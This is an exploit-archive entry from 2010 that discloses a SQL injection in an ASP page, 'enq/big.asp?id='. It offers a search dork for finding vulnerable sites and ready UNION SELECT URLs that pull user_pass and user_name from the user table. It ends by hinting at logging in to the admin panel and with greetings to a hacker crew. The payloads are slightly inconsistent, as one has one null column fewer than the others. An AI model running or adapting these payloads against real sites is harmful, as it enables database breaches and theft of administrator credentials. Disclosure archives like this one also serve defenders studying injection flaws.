(big.asp) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : (big.asp) SQL Injection Vulnerability
# Published : 2010-05-08
# Author : Ra3cH
# Previous Title : B2B Classic Trading Script (offers.php) SQL Injection Vulnerability
# Next Title : PHP Link Manager Version 1.7 Url Redirection Bug

*******************************************************************************
# Author   : Ra3cH
# Price    : N/A
# Title    : (big.asp) SQL Injection Vulnerability
# Site     : www.dz4all.com/cc
# Dork     : inurl:enq/big.asp?id=
# Risk     : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id=  [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Exemple:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N ￡ & n2n &